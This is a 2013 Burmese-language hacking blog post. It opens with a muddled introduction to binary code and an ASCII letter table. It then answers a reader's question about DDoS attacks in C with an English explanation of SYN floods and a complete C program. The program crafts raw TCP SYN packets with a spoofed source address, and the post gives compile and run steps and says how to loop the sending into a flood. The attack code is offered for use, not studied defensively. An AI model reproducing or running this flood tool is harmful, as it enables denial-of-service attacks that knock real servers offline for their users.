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Friday, January 4, 2013

Binary coad အေျကာင္းေလ့လာျကမယ္

Binary coad အေျကာင္းေလ့လာျကမယ္
ဘိုင္နရီ ကုတ္ဆိုတာ ကြန္ပ်ူတာေတြနားလည္တဲ့ စကားေပါ့ ေနာ္အရင္ တံုးကရွင္းျပဖူးပါတယ္
ကြန္ပ်ူတာေတြတစ္လံုးနဲ့ တစ္လံုးဆက္သြယ္တဲ့ အခါမွာ ဒီ computer ေတြကို ဒီတိုင္းဆက္သြယ္လို့မရပါဘူး

သူတို့ကို  တစ္ဦးနဲ့ တစ္ဦး နားလည္တဲ့ ဘိုင္နရီ  ကုတ္ေလးနဲ့ ဆက္သြယ္ထားပါတယ္ ကြန္ပ်ူတာကလည္းဒါပဲ
နားလည္ပါတယ္ 0,1 ေပါ့ ပထမ တစ္လံုးနဲ့တစ္လံုးခ်ိပါဆက္တဲ့ အခါမွာ သူတို့ေတြကို data ေတြပို့ေဆာင္တဲ့ အခါမွာ သက္ဆိုင္ရာ ကြန္ပ်ူတာေတြဆီ ပိုေဆာင္တဲ့ data ေတြေရာက္၇ွိသြားဖို့ ip address ေေတြကိုသံုးပါ
တယ္ ip address ဟာ  computer ေတြရဲ့ ကိုယ္စလွည္ပါ  ဒီ ကြန္ပ်ူတာကေနျပီးေတာ့ အျခားကြန္ပ်ူတာ
တစ္လံုးကို network လိုင္းကေနျပီးဥပမာ photo တစ္ ခုပို့လိုက္တယ္ဆိုပါစို့ ဒီ photo ဟာ ဒီအတိုင္းျကီးေရာက္
သြားတာမဟုတ္ပါ computer နားလည္တဲ့ bynary language နဲ့ 01010010010110000000011111
အျဖစ္ ေျပာင္းလဲျပီးေတာ့ နက္၀က္ေပါင္းသန္းေပါင္းမ်ားစြာကိုျဖက္သန္းျပီးေတာ့ သက္ဆိုင္ရာ ip address
ဆီသို့ေရာက္ေအာင္ပိုေဆာင္ပါတယ္ ဒီ 0 and1 ကို ေရာက္ရွိတဲ့ ကြန္ပ်ူတာက ျပန္လည္ျပီးေတာ့ photo တစ္ခုအျဖစ္တည္ေဆာက္ျပီးေတာ့ ဘာသာျပန္ပါတယ္ ေရွ master hacker  ျကီးေတြက ဒီ bynary
ကို အသံုးျပုျပီးေတာ့ Network ေတြေဖာက္ထြင္း password ေတြဟက္ Web CMS  ကလည္းဒီ binary
နဲ့ မကင္းပါဘူး မကင္းဆို bynary က လူရွုပ္ျကီးကို အဲေလ conputer သံုးေနသမ်ွ ဒီ binary language
နဲ့ ကင္းလို့မရပါဘူး ေျမက္မ်ားစြာ ေသာ computer တိမ္းခ်ပ္မွူ system ေတြဟာ သူနဲ့သက္ဆိုင္ပါတယ္
ဒီေကာင္ကလည္း ထိပ္တန္း script ကို ဒါေျကာင့္ အခ်ို့ master hacker ေတြက ဒီေကာင္ကိုအသံုျပုျကပါတယ္ ခုထိ
A taxonomy of code injection attacks. Code injection attacks. Binary attacks. Dynamic language attacks. ဆိုတာ နာျမည္ျကီး တမင္းငက္ အဲ့ေလ ထြက္ေပါ္လာပါတယ္ ကဲေလ့လာေရးသာရေအာင္ ေသခ်မွတ္သားပါ အလြပ္က်က္ထားပါ ဒါမွ အနာ ဂတ္ျမန္မာ  ဟက္ကာေလာင္းေတြျဖစ္ျကမွာေပါ့  ကဲေရးျကည္ရေအာင္binary language ေတြေနာက္စမယ္

အေျခခံက binary language မွာ english စာေတြကို

     
Letter
Binary Code
A
01000001
B
01000010
C
01000011
D
01000100
E
01000101
F
01000110
G
01000111
H
01001000
I
01001001
J
01001010
K
01001011
L
01001100
M
01001101
N
01001110
O
01001111
P
01010000
Q
01010001
R
01010010
S
01010011
T
01010100
U
01010101
V
01010110
W
01010111
X
01011000
Y
01011001
Z
01011010

Letter
Binary Code
a
01100001
b
01100010
c
01100011
d
01100100
e
01100101
f
01100110
g
01100111
h
01101000
i
01101001
j
01101010
k
01101011
l
01101100
m
01101101
n
01101110
o
01101111
p
01110000
q
01110001
r
01110010
s
01110011
t
01110100
u
01110101
v
01110110
w
01110111
x
01111000
y
01111001
z
01111010
ဒီလိုသက္မွတ္ပါတယ္
ဥပမာ Bob = 010000100110111101100010
        Computer =0100001101101111011011010111000001110101011101000110010101110010

စမ္းျပီးေတာ့ ကြန္ပ်ူတာနားလည္တဲ့ ဘာသာစကားေတြကို လူေတြေရးျကည္ပါ
နံပတ္ကေတာ့
                           
1. 1
2. 10
3. 11
4. 100
5. 101
6. 110
7. 111
8. 1000
9. 1001
10. 1010
11. 1011
12. 1100
13. 1101
14. 1110
15. 1111
16. 10000
17. 10001
18. 10010
19. 10011
20. 10100

ပါ စမ္းေရးျကည္ပါတျဖည္ျဖည္းနဲ့ဒီအေျကာင္းကိုနားလည္လာတဲ့ အခါမွာ ဒီlanguage  ေလးကိုဘယ္လိုတက္ျမတ္စြာ အသံုးျပုရမလဲဆိုတာသိလာပါမယ္
ကဲညီေလးတစ္ေယာက္ကေမးတယ္ C language နဲ့ Ddos attack လုတ္လို့ရသလားတဲ ဘယ္လိုေရးသြားသလဲတဲ့ ညီေလးက C ကိုေလ့လာေနသူပါတဲ့ရတယ္ညီေလးရယ္ ဒါကိုက်ြန္ေတာ္တို့အဖြဲ့
ဆရာျကီးကေရးျပပါမယ္  mr.depaker (RUSSIA) c++,c#, java, python
ပါ  Ddos attack c flood coad ပါ
TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :
1. Client –SYN Packet–> Server
2. Server –SYN/ACK Packet –> Client
3. Client –ACK Packet –> Server

The above 3 steps are followed to establish a connection between source and destination.
SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.
Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.
Below is an example code in c :

     
  
/*
    Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<netinet/tcp.h>   //Provides declarations for tcp header
#include<netinet/ip.h>    //Provides declarations for ip header

typedef struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
    //char tcp[28];
    struct tcphdr tcp;
};

unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}

int main (void)
{
    //Create a raw socket
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    //Datagram to represent the packet
    char datagram[4096];
    //IP header
    struct iphdr *iph = (struct iphdr *) datagram;
    //TCP header
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;

    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    sin.sin_addr.s_addr = inet_addr ("1.2.3.4");

    memset (datagram, 0, 4096); /* zero out the buffer */

    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = htonl (54321); //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ("192.168.1.2");  //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;      /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                should fill in the correct checksum during transmission */
    tcph->urg_ptr = 0;
    //Now the IP checksum

    psh.source_address = inet_addr("192.168.1.2");
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);

    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

    //IP_HDRINCL to tell the kernel that headers are included in the packet
    {
        int one = 1;
        const int *val = &one;
        if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
            printf ("Warning: Cannot set HDRINCL!n");
    }

    //while (1)
    //{
        //Send the packet
        if (sendto (s,      /* our socket */
                    datagram,   /* the buffer containing headers and data */
                    iph->tot_len,    /* total length of our datagram */
                    0,      /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin,   /* socket addr, just like in */
                    sizeof (sin)) < 0)       /* a normal send() */

            printf ("errorn");
        //Data send successfully
        else
            printf (".");
    //}

    return 0;
}
To compile simply : gcc synflood.c
And then : sudo ./a.out (if on Ubuntu)
Use wireshark to check the packets and replies from server.
The sendto function if put in a loop will start flooding the destination ip with syn packets.
Popularity: 39% [?] ေနေသာ္ေအာင္ နဲ့  mr.depaker (RUSSIA) ပါ
Tags: Hacking


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